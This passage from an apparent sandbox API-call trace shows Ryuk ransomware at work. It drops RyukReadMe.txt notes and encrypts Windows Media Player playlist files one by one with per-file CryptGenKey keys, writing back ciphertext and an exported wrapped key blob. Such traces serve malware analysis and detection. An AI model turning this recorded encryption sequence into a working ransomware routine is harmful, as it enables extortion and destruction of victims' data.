HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0142.146] GetLastError () returned 0x0 [0142.146] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0142.147] CloseHandle (hObject=0x198) returned 1 [0142.147] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0142.147] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0142.147] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0142.147] SetLastError (dwErrCode=0x0) [0142.147] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0142.147] GetLastError () returned 0x0 [0142.147] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0142.148] CloseHandle (hObject=0x19c) returned 1 [0142.148] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0142.150] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0142.150] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0142.150] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.151] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl", dwFileAttributes=0x80) returned 1 [0142.151] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\01_music_auto_rated_at_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0142.151] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=1044) returned 1 [0142.151] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=1044) returned 1 [0142.151] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x2f2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.152] ReadFile (in: hFile=0x1a0, lpBuffer=0x29aa228, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa1e8, lpOverlapped=0x0 | out: lpBuffer=0x29aa228*, lpNumberOfBytesRead=0x29aa1e8*=0x19, lpOverlapped=0x0) returned 1 [0142.153] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.153] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa1b0 | out: phKey=0x29aa1b0*=0x3b8690) returned 1 [0142.153] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.153] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.153] ReadFile (in: hFile=0x1a0, lpBuffer=0x2760000, nNumberOfBytesToRead=0x414, lpNumberOfBytesRead=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa1c0*=0x414, lpOverlapped=0x0) returned 1 [0142.153] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4250) returned 1 [0142.153] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x414, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x420) returned 1 [0142.153] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.153] WriteFile (in: hFile=0x1a0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa1c0*=0x420, lpOverlapped=0x0) returned 1 [0142.153] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa200*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa200*, lpNumberOfBytesWritten=0x29aa1c4*=0x6, lpOverlapped=0x0) returned 1 [0142.153] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa1d0 | out: pbData=0x0*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.153] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aa250, pdwDataLen=0x29aa1d0 | out: pbData=0x29aa250*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.153] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa250*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa250*, lpNumberOfBytesWritten=0x29aa1c4*=0x10c, lpOverlapped=0x0) returned 1 [0142.153] CloseHandle (hObject=0x1a0) returned 1 [0142.170] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.174] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.174] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.174] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0142.174] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.175] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl", dwFileAttributes=0x80) returned 1 [0142.175] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\02_music_added_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0142.176] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=1279) returned 1 [0142.176] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=1279) returned 1 [0142.176] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x3dd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.176] ReadFile (in: hFile=0x1a0, lpBuffer=0x29aa228, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa1e8, lpOverlapped=0x0 | out: lpBuffer=0x29aa228*, lpNumberOfBytesRead=0x29aa1e8*=0x19, lpOverlapped=0x0) returned 1 [0142.177] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.177] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa1b0 | out: phKey=0x29aa1b0*=0x3b8690) returned 1 [0142.177] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.177] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.177] ReadFile (in: hFile=0x1a0, lpBuffer=0x2760000, nNumberOfBytesToRead=0x4ff, lpNumberOfBytesRead=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa1c0*=0x4ff, lpOverlapped=0x0) returned 1 [0142.177] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4250) returned 1 [0142.177] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x4ff, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x500) returned 1 [0142.177] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.177] WriteFile (in: hFile=0x1a0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa1c0*=0x500, lpOverlapped=0x0) returned 1 [0142.178] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa200*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa200*, lpNumberOfBytesWritten=0x29aa1c4*=0x6, lpOverlapped=0x0) returned 1 [0142.178] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa1d0 | out: pbData=0x0*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.178] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aa250, pdwDataLen=0x29aa1d0 | out: pbData=0x29aa250*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.178] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa250*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa250*, lpNumberOfBytesWritten=0x29aa1c4*=0x10c, lpOverlapped=0x0) returned 1 [0142.178] CloseHandle (hObject=0x1a0) returned 1 [0142.194] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.198] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.198] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.198] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0142.198] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.198] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl", dwFileAttributes=0x80) returned 1 [0142.198] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\03_music_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0142.199] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=1267) returned 1 [0142.199] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=1267) returned 1 [0142.199] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x3d1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.199] ReadFile (in: hFile=0x1a0, lpBuffer=0x29aa228, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa1e8, lpOverlapped=0x0 | out: lpBuffer=0x29aa228*, lpNumberOfBytesRead=0x29aa1e8*=0x19, lpOverlapped=0x0) returned 1 [0142.200] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.200] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa1b0 | out: phKey=0x29aa1b0*=0x3b8690) returned 1 [0142.200] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.200] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.200] ReadFile (in: hFile=0x1a0, lpBuffer=0x2760000, nNumberOfBytesToRead=0x4f3, lpNumberOfBytesRead=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa1c0*=0x4f3, lpOverlapped=0x0) returned 1 [0142.200] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4250) returned 1 [0142.200] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x4f3, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x500) returned 1 [0142.200] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.200] WriteFile (in: hFile=0x1a0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa1c0*=0x500, lpOverlapped=0x0) returned 1 [0142.200] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa200*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa200*, lpNumberOfBytesWritten=0x29aa1c4*=0x6, lpOverlapped=0x0) returned 1 [0142.200] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa1d0 | out: pbData=0x0*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.200] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aa250, pdwDataLen=0x29aa1d0 | out: pbData=0x29aa250*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.200] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa250*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa250*, lpNumberOfBytesWritten=0x29aa1c4*=0x10c, lpOverlapped=0x0) returned 1 [0142.200] CloseHandle (hObject=0x1a0) returned 1 [0142.217] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.221] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.221] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.221] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0142.221] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.221] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl", dwFileAttributes=0x80) returned 1 [0142.222] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\04_music_played_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0142.222] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=1284) returned 1 [0142.222] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=1284) returned 1 [0142.222] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x3e2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.222] ReadFile (in: hFile=0x1a0, lpBuffer=0x29aa228, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa1e8, lpOverlapped=0x0 | out: lpBuffer=0x29aa228*, lpNumberOfBytesRead=0x29aa1e8*=0x19, lpOverlapped=0x0) returned 1 [0142.223] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.224] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa1b0 | out: phKey=0x29aa1b0*=0x3b8690) returned 1 [0142.224] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.224] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.224] ReadFile (in: hFile=0x1a0, lpBuffer=0x2760000, nNumberOfBytesToRead=0x504, lpNumberOfBytesRead=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa1c0*=0x504, lpOverlapped=0x0) returned 1 [0142.224] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4250) returned 1 [0142.224] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x504, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x510) returned 1 [0142.224] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.224] WriteFile (in: hFile=0x1a0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa1c0*=0x510, lpOverlapped=0x0) returned 1 [0142.224] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa200*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa200*, lpNumberOfBytesWritten=0x29aa1c4*=0x6, lpOverlapped=0x0) returned 1 [0142.224] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa1d0 | out: pbData=0x0*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.224] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aa250, pdwDataLen=0x29aa1d0 | out: pbData=0x29aa250*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.224] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa250*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa250*, lpNumberOfBytesWritten=0x29aa1c4*=0x10c, lpOverlapped=0x0) returned 1 [0142.224] CloseHandle (hObject=0x1a0) returned 1 [0142.251] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.255] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.255] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.255] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0142.255] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.255] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl", dwFileAttributes=0x80) returned 1 [0142.260] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\05_pictures_taken_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0142.261] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=797) returned 1 [0142.261] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=797) returned 1 [0142.261] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x1fb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.261] ReadFile (in: hFile=0x1a0, lpBuffer=0x29aa228, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa1e8, lpOverlapped=0x0 | out: lpBuffer=0x29aa228*, lpNumberOfBytesRead=0x29aa1e8*=0x19, lpOverlapped=0x0) returned 1 [0142.262] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.262] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa1b0 | out: phKey=0x29aa1b0*=0x3b8690) returned 1 [0142.262] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.262] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.262] ReadFile (in: hFile=0x1a0, lpBuffer=0x2760000, nNumberOfBytesToRead=0x31d, lpNumberOfBytesRead=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa1c0*=0x31d, lpOverlapped=0x0) returned 1 [0142.262] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4250) returned 1 [0142.262] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x31d, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x320) returned 1 [0142.262] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.262] WriteFile (in: hFile=0x1a0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa1c0*=0x320, lpOverlapped=0x0) returned 1 [0142.262] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa200*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa200*, lpNumberOfBytesWritten=0x29aa1c4*=0x6, lpOverlapped=0x0) returned 1 [0142.262] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa1d0 | out: pbData=0x0*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.262] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aa250, pdwDataLen=0x29aa1d0 | out: pbData=0x29aa250*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.263] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa250*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa250*, lpNumberOfBytesWritten=0x29aa1c4*=0x10c, lpOverlapped=0x0) returned 1 [0142.263] CloseHandle (hObject=0x1a0) returned 1 [0142.279] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.283] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.283] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.283] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0142.283] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.283] SetFileAttributesW 